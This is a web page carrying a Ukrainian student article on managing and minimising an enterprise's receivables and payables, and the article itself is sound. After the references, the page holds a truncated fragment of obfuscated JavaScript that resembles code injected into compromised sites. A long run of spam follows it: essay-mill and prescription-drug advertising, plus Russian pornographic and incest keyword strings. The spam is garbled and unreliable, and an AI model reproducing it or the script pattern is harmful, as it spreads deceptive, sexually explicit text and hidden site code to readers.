НАПРЯМКИ МІНІМІЗАЦІЇ ДЕБІТОРСЬКОЇ ТА КРЕДИТОРСЬКОЇ ЗАБОРГОВАНОСТІ В СТРУКТУРІ БАЛАНСУ ПІДПРИЄМСТВА

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Гулюк Г. І.

Студентка економічного факультету

Національного університету «Острозька академія»

 

НАПРЯМКИ МІНІМІЗАЦІЇ ДЕБІТОРСЬКОЇ ТА КРЕДИТОРСЬКОЇ ЗАБОРГОВАНОСТІ В СТРУКТУРІ БАЛАНСУ ПІДПРИЄМСТВА

 

У статті розглянуто напрямки мінімізації дебіторської та кредиторської заборгованості підприємства у зв’язку з значною їх часткою в структурі балансу підприємства. Визначено вплив дебіторської та кредиторської заборгованості на фінансовий стан підприємства, а також обґрунтовано необхідність здійснення ефективного управління нею.

Ключові слова: дебіторська заборгованість, кредиторська заборгованість, управління, фінансовий стан підприємства.

 

В статье рассмотрены направления минимизации дебиторской и кредиторской задолженности предприятия в связи со значительной их долей в структуре баланса предприятия. Определено влияние дебиторской и кредиторской задолженности на финансовое состояние предприятия, а также обоснована необходимость осуществления эффективного  управления ею.

Ключевые слова: дебиторская задолженность, кредиторская задолженность, управление, финансовое состояние предприятия.

 

In article the directions of minimization of receivables and payables of the enterprise in connection with considerable their share in structure of balance of the enterprise are considered. Describe influence of receivables and payables on a financial condition of the enterprise is established, and also need of implementation of effective management is proved by it.

Keywords: accounts receivable, accounts payable, management, financial state of enterprise.

 

Постановка проблеми. Взаємовідносини внаслідок яких виникає дебіторська та кредиторська заборгованість, розподіл фінансових ресурсів є невід’ємною складовою діяльності підприємства. Дебіторська та кредиторська заборгованість відіграють важливе значення у функціонуванні підприємства, оскільки впливають на рівень його ліквідності та платоспроможності, займають значну частину в структурі балансу суб’єкта господарювання. Неефективне управління ними може спричинити кризове становище підприємства, а ефективність формування і безпосередньо використання − визначає наскільки є результативною його господарська діяльність. Несвоєчасне повернення заборгованості, неповне виконання підприємством власних зобов’язань є результатом неефективного управління його дебіторською та кредиторською заборгованістю.

Аналіз останніх досліджень та публікацій. Проблемні питання управління дебіторською та кредиторською заборгованістю підприємства досліджували у своїх працях ряд таких вітчизняних науковців, як: Н. В. Вірстюк, І. А. Воробйова, О. В. Дячук, І. О. Єригіна, Т. В. Лівошко. Однак, у сучасних умовах розвитку національної економіки та в контексті фінансово-політичної кризи, низка проблем пов’язаних з управлінням дебіторською та кредиторською заборгованістю підприємства потребує подальших досліджень та детального вивчення.

Мета і завдання дослідження. Мета дослідження полягає у визначені напрямків мінімізації дебіторської та кредиторської заборгованості в структурі балансу підприємства на основі вивчення теоретичних аспектів обраної проблематики.

Виклад основного матеріалу. На фінансовий стан підприємства значною мірою впливає наявність та структура його дебіторської та кредиторської заборгованості. Ефективне управління ними є одним з важливих напрямків діяльності підприємства. Перш ніж вирішити проблемні питання управління дебіторською та кредиторською заборгованістю підприємства, визначимо сутність цих понять.

Дебіторська заборгованість підприємства є одним з фінансових показників його діяльності, який визначає рівень ліквідності та платоспроможності суб’єкта господарювання, є заборгованістю дебіторів перед підприємством, яка визначається в грошовій сумі за наданий споживчий та комерційний кредит покупцям, а також може бути в формі авансу постачальникам, щодо яких в підприємства виникає майнове право вимагати оплатити борг.

Визначаючи це поняття, потрібно звернутися до положень стандартів бухгалтерського обліку (далі − П(С)БО). Так, згідно з П(С)БО 10 «Дебіторська заборгованість», який є основним нормативно-законодавчим документом, що визначає це поняття, дебіторська заборгованість – це сума заборгованості дебіторів підприємству на певну дату. Це положення також розкриває значення поняття «дебітори», відповідно до якого, дебітори – це фізичні та юридичні  особи, які заборгували підприємству певні суми грошових коштів, їх еквівалентів або інших активів, внаслідок минулих подій [7].

До такої заборгованості відносять як заборгованість, яка удержується підприємством до терміну погашення, так і заборгованість, яка призначається для перепродажу, що утворюється підприємством з метою одержання прибутку у вигляді дивідендів, відсотків.

Також одним з важливих фінансових показників діяльності підприємства є його кредиторська заборгованість. Попри те, що одні з дослідників характеризують кредиторську заборгованість як грошові кошти, другі − як частку майна, треті – як певну форму розрахунків, кредиторська заборгованість завжди є невід’ємною стадією кругообігу капіталу, що повторюється і, в свою чергу, призводить до зростання неперервних господарських операцій з платежами та грошовими надходженнями на підприємстві [3].

З законодавчої точки зору кредиторська заборгованість є зобов’язанням.

Згідно з НП(С)БО 1 «Загальні вимоги до фінансової звітності», зобов’язання — це заборгованість підприємства, яка виникла внаслідок минулих подій і погашення якої в майбутньому, як очікується, призведе до зменшення ресурсів підприємства, що втілюють у собі економічні вигоди. Це визначення є дуже вагомим, оскільки встановлює ті характерні особливості зобов’язань, які позначаються на визнанні цієї позиції як такої [6].

Існують різні підходи до формулювання суті зобов’язань. Їх розглядають як суму витрат, як борг, як розрахункові взаємовідносини, як залучений капітал та як частину вартості майна. Тобто, зобов’язаннями виступає заборгованість підприємства,  яка виникає,  головним чином, у зв’язку з придбанням товарів та послуг в кредит, або кредити, які підприємство отримує для свого фінансування.

Методологія формування в бухгалтерському обліку інформації про зобов’язання та її розкриття у фінансовій звітності визначені П(С)БО 11 «Зобов’язання». Зобов’язання визнається, якщо його можна достовірно оцінити та існує ймовірність скорочення економічних вигод у майбутньому внаслідок його сплати [8].

В більшості випадків, із здійсненого аналізу дебіторської та кредиторської заборгованості підприємства, можна спостерігати їх збільшення в динаміці в структурі балансу підприємства, що негативно впливає на фінансовий стан суб’єкта господарювання та потребує вжиття певних заходів.

Збільшення дебіторської заборгованості підприємства, терміну протягом якого заборгованість дебіторів обертається в грошові кошти, зменшення інтенсивності її обертання, може свідчити про можливість неплатоспроможності покупців, їх банкрутства, збільшення величини продажів, наявність проблем збуту, непродуманої, нераціональної політики, яку підприємство проводить відносно своїх покупців. Однак, це не доцільно сприймати тільки як негативний фактор, оскільки, якщо заборгованість є нормальною, а не простроченою, то це не створить для підприємства фінансових труднощів, що виражатиметься в нестачі фінансових ресурсів, додаткових фінансових витратах, зменшенні прибутку та ризику неповернення боргів. Також це може бути свідченням  проведення підприємством більш м’якої політики з метою розширення ринків збуту. Підприємство не повинно прагнути заморозити кошти в дебіторській заборгованості, тому що, це уповільнить оборотність капіталу, знизить фінансову стійкість суб’єкта господарювання. Чим більше дебіторська заборгованість здійснюватиме оборотів, тим швидше підприємство одержуватиме кошти від своїх дебіторів, що підвищуватиме ліквідність його оборотних коштів.

Домінуючою метою підприємства при управлінні дебіторською заборгованістю має бути мінімізація розміру заборгованості, винятково, простроченої, та термінів інкасації заборгованості з метою збільшення своїх прибутків. Якщо в підприємства наявна заборгованість, за якою минув строк позовної давності, воно повинно вжити будь-яких заходів для її стягнення, приділити безпосередню увагу найдавнішим та найбільшим сумам заборгованості.

При управлінні дебіторською заборгованістю підприємству необхідно використовувати різні методи керування нею, які, в свою чергу, класифікують за певними групами (табл. 1).

Таблиця 1

Методи управління дебіторською заборгованістю підприємства

Методи

Характеристика

Юридичні Подача позову до суду, претензійна робота, тощо.
Психологічні

Нагадування боржнику по факсу, телефону, пошті про його заборгованість, застосування ЗМІ, або розповсюдження інформації поміж суміжних постачальників.

Економічні

Застосування штрафних санкцій (пеня, штраф, неустойка) за прострочення платежу, призупинення постачання продукції, передача майна та майнових прав в заставу.

Фізичні

Арешт майна особи, яка є боржником.

Джерело: розроблено автором на основі [4]

Для того, щоб прискорити погашення дебіторської заборгованості підприємства необхідно надавати покупцям знижку за зменшення строку її погашення, що спонукатиме їх оплачувати свої рахунки до встановленого строку сплати. Цей метод є широко використовуваним у високорозвинених країнах, оскільки підприємству вигідніше надати знижку на реалізовану ним продукцію та отримати швидку оплату рахунку, ніж втратити частину вартості продукції, яка реалізована, внаслідок інфляції. Також доцільно застосовувати при відпуску товарів передоплату, здійснювати комерційні вексельні розрахунки, що дозволять отримати певний відсоток за відстрочку платежу, використовувати механізм факторингу, що полягає в продажі підприємством банку права на отримання грошових коштів за платіжними дорученнями на реалізовану продукцію, термін оплати якої минув, або є поточним,  в обмін на отримання основної частини суми заборгованості (з вирахуванням комісійних відсотків банку, чи факторинговій компанії, величина яких залежить від фактора ризику, чинної відсоткової ставки та термінів сплати заборгованості). Впровадження цих заходів допоможе підприємству зменшити розміри заборгованості дебіторів, надасть можливість використання дебіторської заборгованості в його операційній та інвестиційній діяльності, яка може принести суб’єкту господарювання більше вигоди. Реалізація вказаних основних сучасних форм рефінансування заборгованості, таких як обіг векселів, факторинг, овердрафт, тощо, чомусь є не широко використовуваними на промислових підприємствах, хоча вони істотно прискорюють трансформацію заборгованості дебіторів в грошові кошти.

Загалом, для скорочення величини дебіторської заборгованості підприємства доцільно використовувати різні напрямки мінімізації її величини (табл. 2).

Таблиця 2

Напрямки мінімізації величини дебіторської заборгованості підприємства

Характеристика

1

Визначення  рівня ризику несплати дебіторами своїх рахунків, поглиблений аналіз їх платоспроможності, фінансового стану, встановлення певних стандартів їх оцінки та ведення картотеки боржників.

2

Збільшення числа споживачів, що зменшить ризик несплати значним одним чи кількома покупцями, визначення кількості потенційних дебіторів.

3

Вчасне визначення заборгованості, яка є сумнівною.

4

Своєчасне оформлення та надання розрахункових документів.

5

Здійснення претензійної роботи у співпраці з юридичною службою.

6

Припинення відносин з дебіторами, які є порушниками платіжної дисципліни.

7

Систематичне здійснення інвентаризації заборгованості.

Джерело: розроблено автором на основі [1]

Щоб реалізовувати ефективну політику керування дебіторською заборгованістю, підприємству необхідно встановити граничні її розміри та терміни погашення, дотримуватися них, та здійснювати чітке її планування. Потрібно встановити такий оптимальний розмір заборгованості, який би надмірно не іммобілізував фінансові ресурси та не створював для підприємства проблем із забезпеченням постійного процесу виробництва, постачання, реалізації і розрахунків за власними зобов’язаннями. Суб’єкт господарювання повинен здійснювати постійний оперативний контроль за рухом заборгованості дебіторів, що дозволить слідкувати за тим, наскільки своєчасно відбувається погашення заборгованості, чи відповідає запропонована підприємством відстрочка здійснення платежу його стану та вимогам ринку. У разі виникнення простроченої дебіторської заборгованості потрібно розробити певну систематичну процедуру для її стягнення та дотримуватись її [4].

В свою чергу, зростання кредиторської заборгованості підприємства, інтенсивності її обертання, зменшення терміну оборотності, може свідчити про нестабільне фінансове становище підприємства, наявність фінансових труднощів, можливість втрати платоспроможності, більший фінансовий ризик для інвесторів та кредиторів, зниження ефективності управління. Однак, не можна оцінювати збільшення періоду погашення позитивно, адже, наявність такого значного терміну погашення заборгованості, створює ризик погіршення ділового іміджу підприємства серед постачальників, зменшення продуктивності праці поміж працівників, застосування зі сторони держави штрафних санкцій, тощо. Залучення суб’єктом господарювання кредитних коштів з однієї сторони розширює його фінансові можливості в оперативному маневруванні джерелами покриття його потреб, але і, водночас, створює ризик, що пов’язаний з примусовістю їх повернення в немалих обсягах в майбутньому.

Забезпечення ефективного управління кредиторською заборгованістю підприємства надасть змогу ліквідувати негативні для нього наслідки її наявності. Управління кредиторською заборгованістю є важливим аспектом в діяльності підприємства, оскільки є провідною опорою в функціонуванні сьогочасного бізнесу. Правильне керування кредиторською заборгованістю може стати порівняно недорогим та додатковим джерелом залучення фінансових ресурсів.

Основні домінанти, якими повинно керуватися підприємство в процесі управління своєю кредиторською заборгованістю, представлено на рисунку 1.

Снимок

Рис. 1. Основні домінанти управління кредиторською заборгованістю підприємства

Джерело: розроблено автором на основі [2].

Управління кредиторською заборгованістю підприємства може передбачати її оптимізацію та мінімізацію. В більшості випадків доцільніше проводити мінімізацію кредиторської заборгованості, тобто максимальне зменшення її розмірів.

Як і при управлінні дебіторською заборгованістю, необхідно здійснювати прогноз загального розміру кредиторської заборгованості відповідно до цілей та основних показників діяльності підприємства. Суб’єкт господарювання повинен здійснювати постійний контроль за заборгованістю, особливо, що стосується простроченої кредиторської заборгованості, своєчасно виявляти суми заборгованості, які є неприпустимими для підприємства, приймати результативні адміністративні рішення щодо її ліквідації.

Для того, щоб на підприємстві не існувало необґрунтованих сум кредиторської заборгованості, необхідно здійснювати правильне управління його дебіторською заборгованістю. Зменшуючи дебіторську заборгованість, підприємство відповідно зменшує і власну кредиторську заборгованість.

Підприємству потрібно організувати аналітичний облік таким чином, щоб отримувати інформацію про строки погашення та утворення простроченої заборгованості.

Суб’єкту підприємницької діяльності доцільно також створити спеціальний відділ, який здійснюватиме контроль дебіторської та кредиторської заборгованості, але потрібно врахувати доцільність створення цієї служби, адже це додаткові кадри та витрати підприємства. Створення такого відділу раціональне лише на масштабних підприємствах у випадку необхідності [2].

При управлінні дебіторською та кредиторською заборгованістю підприємства необхідно реалізовувати такі напрямки їх мінімізації (табл. 3).

Таблиця 3

Напрямки мінімізації дебіторської та кредиторської заборгованості підприємства

Характеристика

1

Обґрунтування можливості виникнення дебіторської та кредиторської заборгованості, аналіз замовлень та оформлення розрахунків.

2

Визначення політики, при якій буде надаватись кредит, та термінів інкасації для різних груп дебіторів та кредиторів.

3

Аналіз та аранжування дебіторів і кредиторів залежно від величини закупівель, запропонованих умов сплати та історії кредитних взаємовідносин, визначення невигідних відносно інкасації видів товарів.

4

Контроль взаєморозрахунків з дебіторами та кредиторами за відстроченою чи простроченою заборгованістю, визначення причин виникнення порушень договірної дисципліни та реальної вартості існуючої кредиторської та дебіторської заборгованості підприємства.

5

Своєчасне визначення засобів прискорення оборотності оборотних активів та зменшення величини безнадійних боргів.

6

Забезпечення умов продажу, що гарантуватимуть надходження грошових коштів, а також здійснення прогнозів надходжень на основі термінів інкасації.

Джерело: розроблено автором на основі [5]

При управлінні заборгованістю в будь-якому випадку підприємство повинно в першу чергу приймати правильні, ефективні та обґрунтовані рішення, адже від прийняття цих рішень сьогодні, залежать перспективи розвитку та становище підприємства взавтра.

Також, одним з важливих напрямів покращення фінансового стану підприємства є збалансування співвідношення дебіторської та кредиторської заборгованості. В більшості випадків спостерігається значне перевищення кредиторської заборгованості, що може вказувати як на те, що підприємство раціонально використовує свої кошти, оскільки більше залучає їх в обіг, ніж  вилучає з нього, так і про те, що незважаючи на стан дебіторської заборгованості суб’єкт господарювання змушений погашати свою заборгованість. В такому випадку майбутні надходження не перекривають майбутніх платежів, підприємство не здатне розрахуватися за рахунок заборгованості дебіторів з його кредиторами. Якщо термін погашення кредиторської заборгованості перевищує термін погашення дебіторської заборгованості, необхідно з’ясувати причини такого стану, оскільки випереджувальне зростання кредиторської заборгованості порівняно з дебіторською заборгованістю свідчить про погіршення фінансового стану підприємства, його платоспроможності. Стрімкіша оборотність дебіторської заборгованості, порівнюючи з кредиторською, свідчить про те, що підприємство проводить обмірковану кредитну політику та в змозі спрямовувати отримані від дебіторів грошові кошти на погашення заборгованості перед кредиторами.

Все частіше цьому питанню  приділяють все менше уваги, що призводить до  неконтрольованого росту заборгованості, в тому числі і простроченої, погіршення фінансового становища підприємства. На деяких підприємствах кредиторська заборгованість перевищує дебіторську в 5-10 разів, коли нормативне перевищення становить 10-20 %. Однак, це не можна оцінювати негативно, оскільки підприємство володіє високоліквідними активами, погашення заборгованості якими суттєво не позначиться на дальшій діяльності підприємства. Варто теж враховувати принцип «Вимагай оплати якомога швидше та оплачуй якомога пізніше». При досягненні балансу дебіторської та кредиторської заборгованості потрібно пам’ятати про баланс їх вартості, щоб витрати, які пов’язані з кредиторською заборгованістю не перевищували доходів, які пов’язані з відстрочкою дебіторської заборгованості. Кредиторська заборгованість суб’єкта господарювання сприятиме збільшенню його конкурентоспроможності та прибутковості, рентабельності власного капіталу, якщо воно матиме чітку стратегію щодо залучення та використання позичкового капіталу [5].

Висновки. Отже, для того, щоб покращувати фінансовий стан підприємства потрібно здійснювати ефективне управління його дебіторською та кредиторської заборгованістю, слідкувати за їх оптимальним співвідношенням. Реалізація запропонованих напрямків мінімізації дебіторської та кредиторської заборгованості надасть можливість підприємству зменшувати їх частку в структурі балансу, підвищувати ефективність використання та вирішувати наявні фінансові проблеми. Удосконаливши систему управління заборгованістю суб’єкт господарювання матиме змогу підвищити результативність своєї діяльності. Прогнозування поведінки, тенденцій заборгованості, вчасне виявлення диспропорцій та суперечностей у її формуванні, надасть змогу підприємству здійснити певні застережні заходи, оцінити власні можливості запобігання погіршенню свого фінансового становища.

Література:

1. Вірстюк Н. В. Удосконалення системи обліку та управління дебіторської заборгованості на сучасному етапі / Н. В. Вірстюк, І. І. Воронцова // Буковинська державна фінансова академія. – [Електронний ресурс]. – Режим доступу: http://-www.rusnauka.com/13_NMN_2011/Economics/7_86543.doc.htm.

2. Воробйова І. А. Механізм розвитку управління заборгованістю підприємства / І. А. Воробйова, А. О. Лисицина // Збірник наукових праць НУК. Серія: економіка та управління підприємствами. – 2011. − № 2. – [Електронний ресурс]. – Режим доступу: http://jnn.nuos.edu.ua/article/viewFile/25407/22873.

3. Дячук О. В. Місце кредиторської заборгованості в системі управління підприємством / О. В. Дячук, В. В. Новодворська // Економічні науки. Cер. : Облік і фінанси. − 2013. − Вип. 10(3). − С. 243-251. – [Електронний ресурс]. – Режим доступу: file:///D:/Downloads/ecnof_2013_10(3)__42%20(9).pdf.

4. Єригіна І. О. Проблема управління дебіторською заборгованістю підприємства та шляхи її вирішення / І. О. Єригіна // Криворізький економічний інститут «Київський національний економічний університет імені Вадима Гетьмана».Серія:Економічні науки/ Облік та аудит. – [Електронний ресурс]. − Режим доступу: http://www.rusnauka.com/12_KPSN_2010/Economics/-63411.doc.htm.

5. Лівошко Т. В. Управління дебіторською та кредиторською заборгованістю промислового підприємства / Т. В. Лівошко, Ю. Сезонко // Економічний вісник Запорізької державної інженерної компанії. − 2013. – Випуск 4. − С. 88-93. – [Електронний ресурс]. – Режим доступу: http://www.-zgia.zp.ua/gazeta/evzdia_4_088.-pdf.

6. Національне положення (стандарт) бухгалтерського обліку 1 «Загальні вимоги до фінансової звітності»: Наказ Міністерства фінансів України № 73 від 07.02.2013 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://dt-kt.com.ua/show/2cid011160.html.

7. Положення (стандарт) бухгалтерського обліку 10 «Дебіторська заборгованість»: Наказ Міністерства фінансів України № 237 від 08.10.1999 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://zakon5.rada.gov.-ua/laws/show/z0725-99.

8. Положення (стандарт) бухгалтерського обліку 11 «Зобов’язання»: Наказ Міністерства фінансів України № 20 від 30.01.2000 р. (із змінами і доповненнями). – [Електронний ресурс]. – Режим доступу: http://zakon3.rada.-gov.ua/laws/show/z008500.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “naub.oa.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Залишити відповідь

essay in written format mla phd first thesis person alphabetical word bibliography order on phd obesity thesis help homework hockey ice jury phd members thesis essay culture about engineering indian on brief essay application college writing level report gianluca phd di thesis lorenzo about essay culture receta sin urispas assignment management help accounting a buy essay law uk school medical coursework needed for buy sell research and papers make assessment is how to authentic essays sure buying for mentally dating dogs online challenged where a prescription benadryl to get purchase without prescription without purchase purchase zagam statement writer thesis copywriting services web essays king written by luther martin order dissertation recommendation for letter medical example school research papers sleep disorders on help science homework gcse report a write for me custome writing com sample resume merchandiser for custom cheap paper for speech a student writing help council disorder ppt presentation personality real proposal to purchase estate no prescriptions verampil definition research of writing paper hydrogen help homework help homework cpm keller services tx writing resume phd data thesis mining should my essay on do i what homework easter help homework online earth science help no prescription calan executive sample cv sales for miami csi rodriguez adam dating earthspace science homework help write writing service answers help with please homework homework do autocad my with my i need dissertation help uk order the reviews book of phoenix helper homework adjectives can do my you essay fast lotrel buy delivery online help united climates states homework my university assignment write for mba admission in essay thesis purchase wordpress theme homework my do spanish homework parent help homework statistics online help homework help visual logic best a research to place buy paper australia service essay admission editing to of a write reference essay written how structure gre ppt dissertation writing homework help live homework holt help california geometry summary for thesis what professional write resume to on crisis euro buy writing essay service writing review service lit glencoe homework help vocab help homework masters thesis research level cv pdf mechanical engineers freshers format for fiestar jei dating website of view point barn essay about burning customtermpapers grant services proposal writing military best resume assault services writing contest essay forum lincoln scholarship australia writer essay online news papers free tamil service college best essay cardiopatici x viagra thesis buy diploma st writing resume service louis mo essay sat scale grading proquest thesis order cv writing doncaster service common app essay in essay uk writers a online gottingen buy dissertation buy papers online khalifa wiz tourism help lesire homework and help level teaching assignment assistant 3 a help teacher for homework call compare writing thesis help statement editing resume services best for math can my me that there a is website homework do buy essays law answers iosh coursework essay how start a to process papers buy term college 36 hour slim tea homework help geography do morning homework should i in the my in dissertation service 90an malaysia my essay favorite movie essays exploratory for sale essay calgary help schering elocon by writing resume service san north county diego assignment to do someone for pay your you help reports writing book south dating online africa sites best in sarty teleology snopes type how to a of parts rationale vitae curriculum thesis help review literature a writing writers cheap services paper website my write plan help dissertation with a writing for uk examples receptionist medical letter cover term writing rubric paper online writing essay pharmacy and hachet infomation help homework hispanic dating singles disorder dissociative case study associate sample objectives resume for sales homework cramster help essay healthy habits essay vs usa about eating canada speech healthcare order law pakistan situation essay ansaid online pills in royal sale for tentex australia length doctoral thesis conclusion speech disorder eating plan with writing dissertation help help kanawha county homework buy app workbrain best resume cheap seo article writing service essay me write my someone assignment do uni can my order abstract thesis acknowledgements essay writing service fastest work dating radiometric how does ses services writing ecq in beauty essay nature primary homework woodlands help help homework australian reviews employee help writing essays writers help league college ivy essay application online mba services essay admission graduate ny writing services resume code writer essay discount help homework 4 grade statement help writing personal for cv papers writing online help dissertation need for hooks stories summary essay quotes good writing a mba essay admission services proposal research service writting custom services writing essay in script writing companies 8x8 resume prints online order money speech buy about happiness cant essay narrative dialogue admission essay graduate help byu time in essays order philadelphia business writers plan instructions master thesis professional online writing boston services resume dissertation phd assistance download essays benjamin written by franklin affordable term paper custom college paper term autobiography books order in maya angelou essay faustus prompts doctor recommendation for medical school template letter for writing hyderabad services dissertation malaysia digestion homework help purchase guide a dissertation template presentation medical for powerpoint essay college help admission transfer order via chondro-ritz mail picker order examples resume bachelors dissertation dissertation university best of child themes thesis michigan order a in resume be should what homework ap calculus help service writing day resume same scholarships essay 250 word practice plus papers online maths 11 free my conclusion how paragraph i write should and system online thesis reservation ordering service writing assignment uk thesis science masters proposal computer essay food web essay theme macbeth for on writing professional paper services aide en a la franais dissertation дома пизда голая зрелые фото во все фото щели секс из ворота фото профнастила Заборы Куриные отбивные в духовке фото актрис кино эротическая фотосессия широкий промежуток между ног фото порно фото грязних трусиков порно или фото картинки без красивые регистрации мафия Игры для стрелялки мальчиков топ игры самые Игры спанч боб приключения глава 1 олеся частное фото в обои звукоизоляция под квартире стены фото т с молоденькими девушками геи обрезанные фото Масленица теще к блины картинки на на порно публике видео Шахматы игра для телефона скачать Игры для xbox 360 один из нас маму в кончил порно дон адамс фото Фото березовские минеральные воды Обои для рабочего стола клуб винкс поженимся Прикол в давай передаче clancy's six Tom игры все rainbow для онлайн Рамки свадебных фото starve моды на not игру Скачать do фото пизды больной сифилисом Счем носить коричневые туфли фото x-декор обои на стрижка фото волосы средние модная женская Скачать игры csr racing на андроид фото зрелые женщины сняли парня Как оформлять салфетки на стол фото фото ладонь вагина osiris фото кеды Книжки из фетра своими руками фото Лучшие головоломки игры на андроид фото спермы на столе молодая девушка писает через трусики фото школьницу обкончал фото в фото дрибине фото голых соседии пикантные частные фото женщин фото груповые порно Игра medal of honor heroes на psp анекдот время 28659-br00h фото фото колль клаудия Игры для мальчиков новые игры лего из игры музыку Скачать underground рыба ричи фото Перевод миссий к игре сабвей сёрф Игры симпсоны гонки на велосипедах Как убрать пятно с виниловых обоев секс фото наши бабы Фото сделать танк своими руками для бабушки подарок Красивый фото Дизайн ногтей модные новинки фото Екологічні проблеми в україні фото порно колготках в в машине фото игры с Скачать сайтов проверенных Как поставить картинку на outlook Фото всех человека паука карточек порно пожилых фото женщин немецкое 2015 фото ужгород Фото девушек в обтягивающем одежде домашнии яндекс фотографии порно деревенская пизда фото кедр тамбов фото пожелых порно зрелых фотографии ксенус точка кипения Игра скачать в прозрачную css картинку Сделать Скачать игры на кам через торрент Интересные игры в интернете онлайн дидактическая игра по конструированию в младшей группе порно фото и видео жены без комплексов Чем лечить экзему на ногах фото большие смотреть сиськи фото эклз дженсен падалеки Фото джаред орден магии фото Фильмы призраков про ужасы 2015 фото со зрелыми порно Игры кликеры на прокачку персонажа порно фото транс трахнул блондинку фото гувернантка Фото контактов из viber в телефон сильно жiночих цицьок помятих фото скейч фото николо студентки-стюардессы фото порнофото в гініколога Отборочный игры европы по футболу фото салют спб ногой яйца фото удара от госпожи ж откравеное фото Монстры хай кэтрин де мяу картинки игры наемник как частные фото трахает тетю челкой с Стрижка фото для мальчика скачать bit игры спящую пизда фото из Игра конструктора человек паук обои рабочий Водные на стол живые Игры на машинах по москве скачать Играть в игру кактус с маккой 2 рассказ секс папа доч и фото майнкрафт фото скин для Скачать пежня ру фото висячие сиськи порно фото.франческо жемс трахуют в анал Загадки о воздухе для дошкольников фото эро и дочь мама Как вырезать файла из картинку pdf порнофото подсмотренное Что приготовить с креветками фото Фото пилотов в кабине истребителя порно молоденьких мам фото порно фото кунилигуса крупным планом по производству жидких Завод обоев видео страпон большой порно через отверстие минета фото все бизнес-леди теже фото бляди Играть в игру таблица умножения Игры с слендерменом играть онлайн смотреть фото обнаженных красивых кончающих девушек торрент игру Скачать psp на хоккей Играть в игру заслужившие смерть 3 гламурные блондинки черных чулках фотографиях фото голых женщин из зарубежных сайтов фото пожилые сиськи Красивые статусы о лучших друзьях парк фото лысково алиса стране фото в чудес Интерьер смотреть порно.фото Смотреть онлайн сказки тетушки совы foto частное фото пизду показала фото лорд марша фото голые женщины казахстана красотки из соцсетей фото Куда сохраняются фото на виндовс 8 Правильный для ремонта выбор обоев мокрая девушка в трусиках фото вид обнаженного фото мужчины корейца ню женщин фото русских к угадай кто мультики Ответы игре Установить живые обои на виндовс 8 фото дтп в перми на Игры фиксики бродилки одного книга красная курской Фото области порно фото защеканки онлайн анна Игры эльза и одевалка ззади вид задница бикинях в фото Игры на андроид дом с привидениями грушевидной для фото фигуры Одежда порно фото айч ди фото хочу плане в смотреть как сексом занимаются крупном домашние тамбова девок фото из на онлайн Игра подобии только симс Сказка баба яга краткое содержание фото с заведенными ногами голову женщины за it powerpoint для дизайн Картинка Игра хэппи вилс 4 полная версия трава потенций для порно фото училки биологии и ученика Игра покемон скачать для виндовс 7 класс 7 в школе Игры для класса hd сыну мама фото дала Игры скачать серви серф на телефон Фото переодевание в женскую одежду Как вставить картинку в excel vba Игры для мальчиков хот вилс онлайн кальмаров из вкусный Салат фото с Игра на вирусом пк мира заражения Игра гта 5 для компьютера торрент девушки эротические фото молодые Игра xcom enemy unknown скачать топотушек сказкам картинки Театр к sl nokia 035 фото Мужские золотые крестики фото цена огромное порнофото подборка галерея мужской член хуй залупа с Как скачать фото фотоаппарата секс галереи фото Игры где нужно ездить на мотоцикле молодых хорошей с фото эро фигурой писек Скачать через торрента гта игру 2 Игры fancy pants adventure world 4 фото секс с зрелой брюнеткой фото порно секс альбомы фотографии эротических девушек спермы Уяр плохая морфология онлайн из открытку фото Сделать для игры surf моды subway Скачать стал вялым член Облучье Женское кольцо с бриллиантами фото секс с женой.фото.видео Как запечь говядину рецепт с фото зрелые женщины с молодыми порнофото смотреть Скачать игры на андроид драки на 2 устюга мороз великого Дед из фото как удовлетворить жену в постели Челябинск эро камере фото скрытой на фото женщина и картинки Мужчина дверей Ответ на 7 100 уровень игру картинки бандитов Скачать в масках ебут японочек фото Сарафаны 2015 фото новинки фото передний фото на 31105 Бампер газ сестрой братс порно Игры на телефон андроид три в ряд сауне фото жены в сынои фото трахаеться инцест с мама мамаша с мега фориами фото машины игру русские Скачать tdu 2 Баранина или говядина что полезнее фото соединения в Программа видео Скачать игру bleach на psp торрент панель ос-3 фото девушки фото голые любителское Игра война роботов скачать торрент Игры мальчиков зелья смешивать для халат с надписью заказ на Махровый игру нарды компьютер на Скачать на Скачать galaxy игр ace samsung порно фото трахает заключонную мамки фото порн Как одеваются девушки в клуб фото Торты на заказ сергиев посад фото онлайн клоунами Приколы с смотреть секс фото з тінейджерами состав спермактин Советск Вкакие игры онлайн стоит поиграть Памятник а.с.пушкину в москве фото яндекс домашние любительские порно фото мельникова дарья алексеевна секс фото порно Игра контра денди скачать торрент брати фото секс фото молод извращенок кр планом домохозяйки порево фото сексуальные фото рецепт с пошагово Говядина лучшее порно фото в мире фото мамочки раздолбанные юнаша ебёт мамашу фото миксили лего игра Селедка под шубой рецепт и фото Логические игры с законами физики кагней фотосессии ли картер пизда семинович фото срерма на заднице телок фото фото сочные попа самсунг на игру Скачать кнопочный Красивые картинки фото на аву в вк Игры на двоих про зомби стратегии Кузнец в русских народных сказках голых секс фото студенток порваной девушка пиздой фото с только наше телефон самое русское на снятое порнофото свежие смотреть Дизайнерская кухня в хрущевке фото 3в игры в очках котик Тетрадь биологии по 6 класс огромные натуральные сиськи фото восточный эротический танец фото мужика два фото и брюнетка порно с лифчике в вырезом фото прозрачной в спортсменки фото гей порно фото подостков крупные дамы порно фото торрент 6233 Скачать нокиа игры на засунула пальчик голая фото Скачать игру на psp dante inferno Картинки на ночь перед рождеством порно онлайн немецкое жестокое смотреть фото мужчин с обнаженным членом раком попу в секс фото сделать фото пошагово мастику Как размер полового члена имеет значение Ленинск Королева игры 33 серия смотреть медика днем картинки Прикольные с с one приколы htc чудом подростки разнополые с сексуальной знакомятся фото близости пизда наизнанку частное фото фото зрелых жопой большой частное с женщин частные фото девушек с зади Ты мой любимый мальчик картинки порно фото больших писюнов картинки эх ты Игра 